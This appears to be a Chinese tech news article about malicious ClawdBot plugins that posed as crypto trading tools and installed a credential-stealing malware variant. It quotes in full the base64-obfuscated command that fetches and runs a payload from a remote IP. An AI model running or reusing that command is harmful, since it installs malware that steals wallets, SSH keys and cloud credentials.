想象一下，你下载了一款号称「本地运行、绝对安全」的 AI 个人助理，为了让它帮你在加密货币市场大杀四方，你顺手安装了一个热门插件，结果几秒钟后，你的钱包私钥、SSH 凭证和浏览器密码就被打包发送到了地球的另一端。这不是某部赛博朋克电影的剧情，而是 OpenSourceMalware 团队 在 2026 年初揭露的一起大型安全翻车现场。

这是一起典型的针对「懒人经济」和安全意识薄弱群体的精准打击，也是新兴 AI 生态系统中供应链攻击的经典案例。

疯狂的技能库与裸奔的仓库

这起事件的主角是一个名为 ClawdBot 的开源本地 AI 助手。它因为允许用户通过 Telegram 等聊天软件管理本地事务而迅速走红——听起来很酷，就像是把黑客帝国的接口装进了手机里。但问题在于，它的官方插件仓库 ClawHub 在安全审核上基本处于「裸奔」状态。

攻击者在 1 月底短短几天内，向 ClawHub 和 GitHub 批量上传了 386 个 恶意技能包。这些包伪装成加密货币交易自动化工具（比如 Bybit 代理或 Polymarket 交易机器人），甚至一度占据了该平台「最受欢迎榜单」的前列。

令人啼笑皆非的是，这些恶意软件的代码并没有经过高深的混淆，而是直接明文写在插件说明文件的第一段里。正如 Hacker News 的评论所言，仓库管理人员似乎完全没有部署任何安全扫描工具，这简直是在黑客家门前挂了个「欢迎光临」的招牌。

豪华版「尼日利亚王子」：文档里的社会工程学

这些恶意插件之所以能得手，靠的不是什么零日漏洞（0-day），而是简单粗暴的社会工程学。恶意开发者在插件的文档中用醒目的 Unicode 字符画出了巨大的警告框，内容大致是：

⚠️ 在使用此技能前必须下载认证工具 ⚠️

这招虽然老套，但效果拔群。很多用户为了使用所谓的「高级功能」，乖乖照着文档执行了命令。

对于 macOS 用户，攻击脚本会诱导终端运行一段包含 Base64 编码的指令：

echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC82eDhjMHRya3A0bDl1dWdvKSI=' | base64 -D | bash

解码后，这段代码会直接从 IP 地址 91.92.242.30 下载并执行恶意载荷。而在 Windows 上，用户则被诱导下载受密码保护的 ZIP 压缩包，解压并运行名为 AuthTool.exe 的程序。

这就是技术圈常说的「供应链攻击」，只不过这次披上了 AI 的外衣。

NovaStealer 变体：专门收割加密货币

根据后台分析，这次投放的 payloads 很可能是 NovaStealer 恶意软件的一个新变种（标记为 macos-stealer-v2）。一旦运行，它就像一台无情的吸尘器，专门搜集高价值数据：

• 加密货币资产：交易所的 API 密钥、MetaMask 等浏览器插件数据、钱包私钥文件。
• 系统凭证：macOS 钥匙串、浏览器保存的密码、SSH 私钥（~/.ssh/）。
• 云端权限：AWS 凭证、Google Cloud 配置以及开发环境中的 .env 文件。

对于那个还在幻想用 AI 躺赚的用户来说，这无疑是噩梦。在 Hacker News 的讨论区中，有网友犀利地指出，这就像是「把房门大开，然后邀请小偷进来喝茶」，认为这种级别的无知属于「达尔文奖」级别的筛选机制。

生态系统的信任危机

这起事件最令人细思极恐的地方不在于恶意软件本身，而在于生态系统的脆弱性。ClawdBot 的创始人 Peter Steinberger 在面对研究人员的警告时，甚至在社交媒体上坦言「无法保护仓库安全」，并且拒绝大规模下线这些可疑的技能。

这种「先发布，后修补（或者干脆不修补）」的草台班子作风，在当前的 AI 创业浪潮中似乎成了常态。只要炒作到位，只要 GitHub 上的 Stars 数够多（甚至有评论质疑这些 Stars 可能是刷出来的机器人），安全性就可以被抛诸脑后。

正如评论员们所讽刺的，AI 技术本身是中立的，但围绕它的圈子正在迅速沦为骗子和无知者的游乐场。就像 NPM 或 PyPI 之前经历过的恶意包投毒一样，任何允许第三方代码自动执行的平台，如果没有严格的审核机制，最终都会沦为黑客的后花园。

结语

这起事件给所有跟风尝鲜的用户上了一课：本地运行并不意味着绝对安全。当你为了省事，给一个语言模型赋予访问你生产环境服务器或加密钱包的权限时，你实际上是在和一个潜在的「超级实习生」共享你的命门。

如果你非要在自己的主力机上运行这些甚至不稳定的 AI 代理，至少请把它们扔进虚拟机（VM）里，或者像一些极客建议的那样，专门买一台只有物理网络连接的旧电脑折腾。毕竟，在这个连文档里的代码都不一定是安全的年代，保持一点「技术洁癖」或许能帮你保住私房钱。